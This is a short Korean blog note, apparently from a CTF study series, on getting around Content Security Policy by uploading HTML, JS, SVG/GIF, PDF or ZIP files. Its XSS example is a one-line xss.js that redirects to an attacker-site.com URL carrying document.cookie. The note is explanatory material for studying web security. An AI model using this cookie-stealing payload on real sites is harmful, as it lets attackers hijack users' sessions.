반응형
업로드 기반 CSP 우회 시도 기법
업로드 가능한 파일 종류
- HTML 파일: xss.html 파일을 업로드하여 HTML 코드 실행 시도.
- JavaScript 파일: xss.js 파일 업로드 후 <script src="uploads/xss.js">로 호출.
- 이미지 파일 (GIF, SVG): 일부 이미지 포맷에 스크립트를 숨겨 실행.
- PDF, ZIP 파일: PDF 내 스크립트 삽입, 압축파일 내 악성 HTML/JS 포함.
XSS 시도 예시
- 공격자가 다음과 같은 xss.js를 업로드:
location.href = "<https://attacker-site.com/steal?cookie=>" + encodeURIComponent(document.cookie);
- 이후 업로드된 파일을 호출:
반응형
'Security > CTF' 카테고리의 다른 글
| 8.1 SSTI - server flag (0) | 2025.01.22 |
|---|---|
| 3.3 SQLi_WAF_3 (0) | 2025.01.22 |
| 3.1 SQLi_WAF_1 (0) | 2025.01.22 |
| Web_main 기초 과정 정리 (0) | 2025.01.20 |
| 3.2 SQLi_WAF_2 (0) | 2025.01.20 |